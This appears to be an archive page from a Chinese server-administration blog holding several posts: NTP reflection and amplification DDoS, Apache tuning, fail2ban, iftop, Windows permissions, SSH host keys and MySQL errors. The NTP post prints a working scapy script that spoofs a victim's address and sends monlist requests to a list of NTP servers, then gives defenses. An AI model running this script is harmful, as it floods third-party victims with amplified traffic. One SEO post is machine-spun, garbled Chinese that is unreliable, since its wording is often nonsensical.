存档

文章标签 ‘vps’

浅析基于 NTP 的反射和放大攻击

2016年3月3日 没有评论

最近一段时间 DDoS 攻击事件让基于 NTP 的 DDoS 攻击变得很火热。
1.什么是 NTP
NTP 是网络时间协议(Network Time Protocol)的简称,干嘛用的呢?就是通过网络协议使计算机之前的时间同步化。

2.NTP 反射和放大攻击
那什么是 NTP 反射和放大攻击呢?如果听过 DNS 反射和放大攻击的话应该就会对这个比较容易理解了,协议不同,效果一样。

我们先来说说放射和放大攻击:

无论是基于 DNS 还是基于 NTP,其最终都是基于 UDP 协议的。在 UDP 协议中正常情况下客户端发送请求包到服务端,服务端返回响应包到客户端,但是 UDP 协议是面向无连接的,所以客户端发送请求包的源 IP 很容易进行伪造,当把源 IP 修改为受害者的 IP,最终服务端返回的响应包就会返回到受害者的 IP。这就形成了一次反射攻击。

放大攻击呢就是一次小的请求包最终会收到一个或者多个多于请求包许多倍的响应包,这样就达到了四两拨千斤的效果。

那我们接着来看什么是 NTP 的反射和放大攻击,NTP 包含一个 monlist 功能,也被成为 MON_GETLIST,主要用于监控 NTP 服务器,NTP 服务器响应 monlist 后就会返回与 NTP 服务器进行过时间同步的最后 600 个客户端的 IP,响应包按照每 6 个 IP 进行分割,最多有 100 个响应包。

我们可以通过 ntpdc 命令向一个 NTP 服务器发送 monlist 以及结合抓包来看下实际的效果。

vps12com@test ~$ ntpdc -n -c monlist x.x.x.x | wc -l

602


在上面的命令行中我们可以看到一次含有 monlist 的请求收到 602 行数据,除去头两行是无效数据外,正好是 600 个客户端 IP 列表,并且从上面图中的 wireshark 中我们也看到显示有 101 个 NTP 协议的包,除去一个请求包,正好是 100 个响应包。

从上图中我们可以看到请求包的大小为 234 字节,每个响应包为 482 字节,如果单纯按照这个数据我们可以计算出放大的倍数是:482*100/234 = 206 倍。其实如果通过编写攻击脚本,请求包会更小,这个倍数值会更大,这样算起来是不是蛮屌的。

我们通过 scapy 实现一个简单的攻击脚本,代码如下:

?View Code PYTHON
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#!/usr/bin/env python
# author: vps12.com
 
import sys
from scapy.all import *
 
def attack(target, ntp_server):
    send(IP(dst=ntp_server, src=target)/(UDP(sport=52816)/NTP(version=2, mode=7, stratum=0, poll=3, precision=42)))
 
if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit(1)
 
    target = sys.argv[1]
    ntp_server_file = sys.argv[2]
    for ntp_server in open(ntp_server_file, "r"):
        ntp_server = ntp_server.strip()
        if ntp_server != "":
            attack(target, ntp_server)

如何防御
我们可以分为两种情况进行防御
一、加固 NTP 服务
1. 把 NTP 服务器升级到 4.2.7p26及以上。
2. 关闭现在 NTP 服务的 monlist 功能,在ntp.conf配置文件中增加`disable monitor`选项
3. 在网络出口封禁 UDP 123 端口
二、防御 NTP 反射和放大攻击
1. 由于这种攻击的特征比较明显,所以可以通过网络层或者借助运营商实施 ACL 来防御
2. 使用防 DDoS 设备进行清洗

Win2003下Apache性能优化

2014年9月12日 没有评论

一直习惯在Solaris和linux下跑amp,前些时服务器硬盘坏掉,所以启用新服务器。新系统是Windows 2003 Server,在上面按Unix上的经验配置Apache和Mysql时问题多多,经过折腾,总算是让服务器稳定下来,总结问题和解决办法如下(apache2.2.8+Mysql5.0.51a+php5.2.5):

1、Apache线程数和超时设置

Apache的线程数控制文件为conf/exrtra/http-mpm.conf,需要在httpd.conf中将 Include conf/extra/httpd-mpm.conf前#去掉,以使得http-mpm.conf生效。

在Windows系统中,起作用的是Winnt mpm段,


ThreadsPerChild 150
MaxRequestsPerChild 0

缺省的配置一般够用,但负荷大的网站就要修改了,否则网站一下就变慢或没有响应了。实际可以根据apache-status查看apache实时连接状态,我的服务器最后设置如下:


ThreadsPerChild 350
ThreadLimit 350
MaxRequestsPerChild 10000

Win32DisableAcceptEx
EnableMMAP Off
EnableSendfile Off

其中ThreadLimit是占用系统线程数限制,最好加上,否则会产生内存溢出导致Apache当掉。

MaxRequestsPerChild我理解是请求的缓存数,太小了影响性能,占用cpu时间,太大了占用内存资源,想象一下你网站的文件个数,然后自己设定,只要不为0就可以,防止内存溢出。

ThreadsPerChlid是apache的线程数,就是开了这么多的线程来等待响应客户端请求,需要根据apache-status实时的监控调节,大了会占用过多内存,小了会导致连接不上。而且应该同时修改httpd-default.php超时设置来配合。

在httpd.conf中去掉Include conf/extra/httpd-default.conf前的#以使httpd-default.php生效。

其中调节以下参数

Timeout 15 (连接超时缺省为300,太大了,缩小会减少同时连接数,即上面占用的实际线程数)

KeepAlive On (开启可以提高性能,因为一个页面一般会有多个请求)

MaxKeepAliveRequests 50 (这个数目自己根据网页内容调节)

KeepAliveTimeout 5 (这个小于Timeout就行)

Windows下长期运行Apache还是不如Unix稳定,可以让Apache在凌晨人少时自动重启,用Windows的计划任务可以非常方便的实现这一点,这样网管基本上可以安心睡觉了。

CentOS下安装fail2ban防暴力破解工具(转)

2014年6月15日 没有评论

CentOS下安装fail2ban防暴力破解工具:

前言:首先说说为什么笔者会想到写这篇博客,源于昨天下午,突然收到Nagios的报警邮件,说邮件服务器的进程数超过阀值。于是赶紧登录上去查看。

这里说下分析的过程:
1.既然说进程数超过阀值,肯定先查看进程:ps -ef;
2.如果不能即时看到问题,那就动态显示:top,看看究竟是哪个程序占用这么多进程;
3.最后确定了应该是courier-imap,但还不知道是什么原因导致;
4.查看ip连接,确认是否是其存在问题:netstat -ant,发现有大量的110连接;

5.既然是收信服务,那就赶紧追踪查看邮件日志:tail -f /var/log/maillog;
6.发现问题:日志里有大量的登录错误信息,发现是同一ip,并在用不同的用户名密码来暴力破解

7.稍等一会,确定目标IP后,将其ip的包丢弃:iptables -I INPUT -s 176.61.143.41 -j DROP #此ip为真实攻击ip,所以在此曝光
8.稍等一会,再次查看进程,进程数有明显下降,故障解决。

介于这种安全隐患的存在,我们以后可以利用fail2ban来实现防暴力破解,防止恶意攻击。
下面就来说说fail2ban具体是什么。
简介:
fail2ban可以监视你的系统日志,然后匹配日志的错误信息(正则式匹配)执行相应的屏蔽动作(一般情况下是调用防火墙屏蔽),如:当有人在试探你的SSH、SMTP、FTP密码,只要达到你预设的次数,fail2ban就会调用防火墙屏蔽这个IP,而且可以发送e-mail通知系统管理员,是一款很实用、很强大的软件!

功能和特性:
1、支持大量服务。如sshd,apache,qmail,proftpd,sasl等等
2、支持多种动作。如iptables,tcp-wrapper,shorewall(iptables第三方工具),mail notifications(邮件通知)等等。
3、在logpath选项中支持通配符
4、需要Gamin支持(注:Gamin是用于监视文件和目录是否更改的服务工具)
5、需要安装python,iptables,tcp-wrapper,shorewall,Gamin。如果想要发邮件,那必需安装postfix或sendmail
核心原理:
其实fail2ban就是用来监控,具体是调用iptables来实现动作!

好了,那下面来说说具体怎么安装、部署吧。
一、首先是服务安装
首先配置yum源,这里采用的是yum直接装(也可源码安装)
vim /etc/yum.repos.d/CentOS-Base.repo
在最后新增:
[atrpms]
name=Red Hat Enterprise Linux $releasever – $basearch – ATrpms
baseurl=http://dl.atrpms.net/el$releasever-$basearch/atrpms/stable
gpgkey=http://ATrpms.net/RPM-GPG-KEY.atrpms
gpgcheck=1
enabled=1
然后直接就yum装:yum -y install fail2ban
安装完成后,服务配置目录为:/etc/fail2ban
/etc/fail2ban/action.d #动作文件夹,内含默认文件。iptables以及mail等动作配置
/etc/fail2ban/fail2ban.conf #定义了fai2ban日志级别、日志位置及sock文件位置
/etc/fail2ban/filter.d #条件文件夹,内含默认文件。过滤日志关键内容设置
/etc/fail2ban/jail.conf #主要配置文件,模块化。主要设置启用ban动作的服务及动作阀值
/etc/rc.d/init.d/fail2ban #启动脚本文件

二、安装后配置
首先来看看日志文件的默认定义:
cat /etc/fail2ban/fail2ban.conf |grep -v ^#
[Definition]
loglevel = 3
logtarget = SYSLOG #我们需要做的就是把这行改成/var/log/fail2ban.log,方便用来记录日志信息
socket = /var/run/fail2ban/fail2ban.sock
再来看看主配置默认生效的配置:
cat /etc/fail2ban/jail.conf |grep -v ^# |less

[DEFAULT] #全局设置
ignoreip = 127.0.0.1 #忽略的IP列表,不受设置限制(白名单)
bantime = 600 #屏蔽时间,单位:秒
findtime = 600 #这个时间段内超过规定次数会被ban掉
maxretry = 3 #最大尝试次数
backend = auto #日志修改检测机制(gamin、polling和auto这三种)

[ssh-iptables] #针对各服务的检查配置,如设置bantime、findtime、maxretry和全局冲突,服务优先级大于全局设置
enabled = true #是否激活此项(true/false)
filter = sshd #过滤规则filter的名字,对应filter.d目录下的sshd.conf
action = iptables[name=SSH, port=ssh, protocol=tcp] #动作的相关参数
sendmail-whois[name=SSH, dest=root, sender=fail2ban@example.com] #触发报警的收件人
logpath = /var/log/secure #检测的系统的登陆日志文件
maxretry = 5 #最大尝试次数
PS:logpath(Centos5和Rhel5中)要写成/var/log/secure,这个是系统登陆日志,不能随意设置

service fail2ban start #启动服务即可(就用默认的主配置文件里定义的)
service iptables start #fail2ban依赖预iptables #之前改过日志路径,不行的话就再重启fail2ban
三、测试功能
测试机:192.168.30.251
fail2ban:192.168.29.253

在测试机上ssh 192.168.29.253,并且连续输入超过5次密码不对(经测试有延迟,多试几次),就会出现下图,连接不上

fail2ban上会产生日志记录:阻挡了此ip的续连

四、扩展说明
其实fail2ban的功能还是很丰富的,刚刚只是测试了它的防ssh暴力破解功能。
下面简单提下我用的一些功能:
本人是用在邮件服务器上,所以会监控pop、http等服务,具体配置见下(不做演示了)
[pop3]
enabled = true
filter = courierlogin
action = iptables[name=pop3, port=110, protocol=tcp]
logpath = /var/log/maillog
bantime = 1800
findtime = 300
maxretry = 30

[webmail]
enabled = true
filter = webmail
action = iptables[name=httpd, port=http, protocol=tcp]
logpath = /var/log/maillog
bantime = 900
findtime = 300
maxretry = 5

好了,就先到这里吧!

各类网站seo优化方法总结

2013年10月11日 没有评论

上面笔者就来重点讲授1些这3种榜样网站的优化方法。

首先、图片站

置信本人也都知道搜寻引擎是不克不及够辨认网站上的图片的,以是说咱们在做网站的时辰都是禁止呈现大批图片的,可是对于咱们的图片站而言,网站上面的形式就只需图片,是以咱们在给图片站做优化的时辰要分外的尽心,真实对于图片站而言合理哄骗alt标签是很弥留的,对于每1张图片咱们都需要给它加之alt来刻画这张图片,来告诉搜寻引擎这是1张甚么样的图片,如许对提高收录和排名是颇有帮忙的,其次需要留意的1点便是网站中图片大小的问题,假设说网站中呈现大批的大幅图片的话,对网站的加载速率的影响是很大的,时常会导致网站翻开痴钝进而目标用户损失。

其次、商城站

对于商城站而言,既然用户来到了你的网站,咱们就要以最好的办事来留住用户,让他们购买咱们的产物,这也便是咱们时常说到的网站用户体验的问题,当用户来到咱们的网站就要给他温暖的感慨,网站页面经管要符合咱们的产物个性,其次便是对于产物先容要显眼,而且写得有品位,有利于用户阅读,网站上的宰割法子要显眼,以便用户碰着问题时随时征询,最后要夸张的1点便是购买流程要得当的烦复1点,物流快1点。

最后、资讯类网站

对于资讯类网站1般都是以速率和数量来取胜的,网站1般以翰墨居多,不有甚么花梢的图片,用户来到网站也仅仅是体会1些最新的新闻,基于这1点,新闻的时效性是很弥留的,要时分的收集各种行业的新闻,只需如许本领够透露表现新闻站的个性,其次,要想更好的排汇用户的眼球网站问题的写法是很弥留的,咱们的问题要写得充足有妙技含量,要梗概排汇用户阅读,可是有不要与文章主题偏离太远,而且对于1些斗劲好的文章放在网站最显眼的中央,其次便是网站形式,形式为王,既然是资讯类网站就越发应该做好网站形式了,要包管网站有充沛的形式,包管形式要可读性是最弥留的,其次便是文章布局的问题,要多分段,不要1篇文章1段话就说完了,如许的文章我想不有人奋力读。最后需要夸张的1点便是文章中要得当呈现大批的锚文本以及在侧栏陈设最新新闻和相干阅读的文章,这些都是做好用户体验的快速点。

本文由运维部落所发表转载请保留

 

分类: 搜索&seo 标签: , ,

百度与谷歌对于关键词的排名分析

2013年10月4日 没有评论

一、百度比谷歌更注重网站权重
网站权重对一个网站来说是非常重要的,高权重的网站想要把一个关键词上去,花费的时间远远要比权重低的网站要来的容易。而百度更加注重网站权重这点,很多关键词都是被那些权重比较高的关键词所占领,它往往不怎么考虑文章的更新度,输入一个关键词往往出现一些权重较高的2010年发布的文章;而谷歌更乐意收录那些比较新的文章,如果你一篇文章质量高,被收录后,马上就会让你这篇文章排到一个不错的位置,哪怕你是一个权重很低的新站。从这一点可以看出百度比谷歌更注重网站的权重。

二、分词方面:谷歌更注重完全匹配
随着百度算法的改变,现在很多站长对于一个网站的title写法有了一个大的改变,以前都是非常注重关键词的完全匹配,比如这种写法:整人短信_整人短信大全_搞笑整人短信_最新整人短信 – xxx短信网,这样就可以以完全匹配的方式做这四个关键词,而现在很多站长都是用一句话来概括网站的title,比如把刚才的写法写成:最新搞笑整人短信大全-xxx短信网,这种写法完全涵盖了全面的关键词,但是需要利用百度的分词原理才能整理出那些关键词来;而谷歌现在依然很重视完全匹配的方式,而28短信网www.vps12.com/输入一个关键词,找到一个相关的文章远远要比百度找出来的文章相关性要高很多。或许百度就是因为太重视网站权重而导致这种情况所致吧。

三、谷歌比百度更重视原创
一篇文章是哪个网站原创的,有时候真的难以让人分辨,因为搜索引擎并没有把一篇原创的文章放在第一位,而把转载的文章放在后面。特别是针对百度搜索引擎。很多站长都会发现自己在a5,chinaz投搞的文章,被转载了很多,却把转载的网站排在了第一的位置,而谷歌的做法截然不同,它更加注重原创的文章,一篇文章只要是原创的,它往往就会把这篇文章排到第一的位置,把那些转载的网站都排到后面,哪怕你这个网站是一个权重低的网站。谷歌比百度更重视原创,或许这又是百度更注重网站权重的一个原因吧。

linux下流量查看工具iftop介绍

2013年8月30日 没有评论

简介

iftop是类似于linux下面top的实时流量监控工具。

系统优点

iftop可以用来监控网卡的实时流量(可以指定网段)、反向解析IP、显示端口信息等,详细的将会在后面的使用参数中说明。

安装方法

iftop使用方法
如果采用编译安装可以到iftop 官网下载最新的源码包。
安装前需要已经安装好基本的编译所需的环境,比如make、gcc、autoconf等。安装iftop还需要安装libpcap和libcurses。

CentOS上安装所需依赖包:
yum install flex byacc libpcap ncurses ncurses-devel

Debian上安装所需依赖包:
apt-get install flex byacc libpcap0.8 libncurses5
wget IFTOP URL
tarzxvf iftop-0.17.tar.gz
cdiftop-0.17
./configure
make && make install

CentOS系统运行:
yum install iftop

Debian系统 运行:
apt-get install iftop

运行iftop
直接运行: iftop
相关参数及说明
TX:发送流量
RX:接收流量
TOTAL:总流量
Cumm:运行iftop到目前时间的总流量
peak:流量峰值
rates:分别表示过去 2s 10s 40s 的平均流量
-i设定监测的网卡,如:# iftop -i eth1
-B 以bytes为单位显示流量(默认是bits),如:# iftop -B
-n使host信息默认直接都显示IP,如:# iftop -n
-N使端口信息默认直接都显示端口号,如: # iftop -N
-F显示特定网段的进出流量,如# iftop -F 10.10.1.0/24或# iftop -F 10.10.1.0/255.255.255.0
-h(display thismessage),帮助,显示参数信息
-p使用这个参数后,中间的列表显示的本地主机信息,出现了本机以外的IP信息;
-b使流量图形条默认就显示;
-f这个暂时还不太会用,过滤计算包用的;
-P使host信息及端口信息默认就都显示;
-m设置界面最上边的刻度的最大值,刻度分五个大段显示,例:# iftop -m 100M
按h切换是否显示帮助;
按n切换显示本机的IP或主机名;
按s切换是否显示本机的host信息;
按d切换是否显示远端目标主机的host信息;
按t切换显示格式为2行/1行/只显示发送流量/只显示接收流量;
按N切换显示端口号或端口服务名称;
按S切换是否显示本机的端口信息;
按D切换是否显示远端目标主机的端口信息;
按p切换是否显示端口信息;
按P切换暂停/继续显示;
按b切换是否显示平均流量图形条;
按B切换计算2秒或10秒或40秒内的平均流量;
按T切换是否显示每个连接的总流量;
按l打开屏幕过滤功能,输入要过滤的字符,比如ip,按回车后,屏幕就只显示这个IP相关的流量信息;
按L切换显示画面上边的刻度;刻度不同,流量图形条会有变化;
按j或按k可以向上或向下滚动屏幕显示的连接记录;
按1或2或3可以根据右侧显示的三列流量数据进行排序;
按<根据左边的本机名或IP排序;
按>根据远端目标主机的主机名或IP排序;
按o切换是否固定只显示当前的连接;
按f可以编辑过滤代码,这是翻译过来的说法,我还没用过这个!
按!可以使用shell命令,这个没用过!没搞明白啥命令在这好用呢!
按q退出监控。

windows 给帐户添加“作为服务登录”权限

2013年5月7日 没有评论

应用到: Windows Server 2003 R2
给帐户添加“作为服务登录”权限
向本地计算机中的帐户添加“作为服务登录”权限
打开“本地安全策略”。
在控制台树中,双击“本地策略”,然后单击“用户权限分配”。
在细节窗格中,双击“作为服务登录”。
单击“添加用户或用户组”,然后添加适当的帐户到具有作为服务登录权限的帐户列表。
处于加入某个域的工作站或服务器上时,向某个组策略对象的帐户添加“作为服务登录”权限
单击“开始”,指向“运行”,键入 mmc,然后单击“确定”。
在“文件”菜单中,单击“添加/删除管理单元”。
在“添加/删除管理单元”中,单击“添加”,然后在“添加独立管理单元”中双击“组策略对象编辑器”。
在“选择组策略对象”中单击“浏览”,浏览至要修改的组策略对象 (GPO),单击“确定”,然后单击“完成”。
单击“关闭”,然后单击“确定”。
在控制台树中,单击“用户权限分配”。
位置
GroupPolicyObject [ComputerName] Policy

计算机配置

Windows 设置

安全设置

本地策略

用户权限分配

在细节窗格中,双击“作为服务登录”。
如果尚未定义该安全设置,请选中“定义这些策略设置”复选框。
单击“添加用户或用户组”,然后将适当的帐户添加到具有作为服务登录权限的帐户列表。
处于已安装 Windows Server 2003 Administration Tools Pack 的域控制器或计算机中时,向某个组策略对象的帐户添加“作为服务登录”权限
打开“Active Directory 用户和计算机”。
在控制台树中,右键单击要编辑安全设置的域或组织单位 (OU)。
单击“属性”,然后单击“组策略”选项卡。
在“组策略对象链接”中,单击域的组策略对象或要编辑安全设置的 OU,然后单击“编辑”。
在控制台树中,单击“用户权限分配”。
位置
GroupPolicyObject [ComputerName] Policy

计算机配置

Windows 设置

安全设置

本地策略

用户权限分配

在细节窗格中,双击“作为服务登录”。
如果尚未定义此安全设置,请选中“定义这些策略设置”复选框。
单击“添加用户或用户组”,然后将适当的帐户添加到具有作为服务登录权限的帐户列表。
处于域控制器中时,仅向域控制器的帐户添加“作为服务登录”权限
打开“域控制器安全策略”。
在控制台树中,单击“用户权限分配”。
位置
安全设置

本地策略

用户权限分配

在细节窗格中,双击“作为服务登录”。
如果尚未定义此安全设置,请选中“定义这些策略设置”复选框。
单击“添加用户或用户组”,然后将适当的帐户添加到具有作为服务登录权限的帐户列表。
注意
要打开“本地安全策略”,请单击“开始”,依次指向“控制面板”、“管理工具”,然后双击“本地安全策略”。

要打开“域控制器安全策略”,请单击“开始”,依次指向“所有程序”、“管理工具”,然后单击“域控制器安全策略”。

更改了安全设置后,该设置将在下一次刷新设置时生效。

在工作站或服务器上,每 90 分钟刷新一次安全设置;在域控制器上,每 5 分钟刷新一次安全设置。不管是否进行更改,安全设置都会每 16 小时刷新一次。

[转]系统启动时出现错误:应用程序-特定 权限设置未将 COM 服务器应用程序

2013年5月4日 没有评论

系统启动时出现错误:应用程序-特定 权限设置未将 COM 服务器应用程序(CLSID 为 {BA126AD1-2166-11D1-B1D0-00805FC1270E})的 本地 激活 权限授予用户 NT AUTHORITY\NETWORK SERVICE 的解决.
系统是windows server 2003R2.启动时出现了问题:
应用程序-特定 权限设置未将 COM 服务器应用程序(CLSID 为 {BA126AD1-2166-11D1-B1D0-00805FC1270E})的 本地 激活 权限授予用户 NT AUTHORITY\NETWORK SERVICE SID (S-1-5-20)。可以使用组件服务管理工具修改此安全权限。
看此提示,于是找到组件服务管理器,展开DCOM服务,但是找死找不到(CLSID 为 {BA126AD1-2166-11D1-B1D0-00805FC1270E})的项.

根据提示信息,实际上是说NETWORK SERVICE没权限激活CLSID为{BA126AD1-2166-11D1-B1D0-00805FC1270E}的应用程序。可以通过使用组件服务管理工具修改此安全权限。
1、如果按上面的提示去使用组件服务管理工具找CLSID为{BA126AD1-2166-11D1-B1D0-00805FC1270E}的应用程序是找不到的。
2、需要先运行regedit.exe在注册表中查找出{BA126AD1-2166-11D1-B1D0-00805FC1270E}对应的AppID值{27AF75ED-20D9-11D1-B1CE-00805FC1270E}
3、然后再打开组件服务,查看方式为详细信息,找到DCOM 配置里的netman,选中按鼠标右建选属性。
4、在netman属性里的安全 -> “启动和激活权限” -> 自定义编辑,在启动权限里加入NETWORK SERVICE用户,允许本地启动和本地激活,确定后就不会再报这个DCOM错了。
照着操作,问题顺利解决.

ssh连接的时候出现Host key verification failed.

2013年5月1日 没有评论

今天在服务器上执行远程操作命令出现以下的问题:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
[root@www ~]# ssh 192.168.1.**
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@    WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!     @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that the RSA host key has just been changed.
The fingerprint for the RSA key sent by the remote host is
3c:2a:3a:d5:ae:2b:76:52:*:*.
Please contact your system administrator.
Add correct host key in /root/.ssh/known_hosts to get rid of this message.
Offending key in /root/.ssh/known_hosts:20
RSA host key for 192.168.1.** has changed and you have requested strict checking.
Host key verification failed.

解决方法:
在正在操作的机器上执行

1
vi ~/.ssh/known_hosts

进入此目录,删除的192.168.1.**相关rsa的信息即可.
或者删除这个文件

1
2
cd ~/.ssh/
rm known_hosts

解决mysql数据库Forcing close of thread 的错误提示

2013年4月8日 没有评论

今天发现客户的网站老出现打不开的情况,发现连接数有超出的现象,但观察系统事件日志,都是下面的错误:

MySQL: Forcing close of thread **** user:”

事件类型: 警告
事件来源: MySQL
事件种类: 无
事件 ID: 100
日期: 2013-4-8
事件: 12:21:01
用户: N/A
计算机: vps12com0630
描述:
MySQL: Forcing close of thread 123756 user: ”

For more information, see Help and Support Center at http://www.mysql.com.

检查系统资源和连接数都是正常的情况下,没有找到解决办法。

在mysql配置文件my.ini 的 [mysql] 下面加上这个解决问题了!

skip-locking
skip-name-resolve

其他的同类错误要注意查看日志。新版本mysql的写法应该是:

skip-external-locking
skip-name-resolve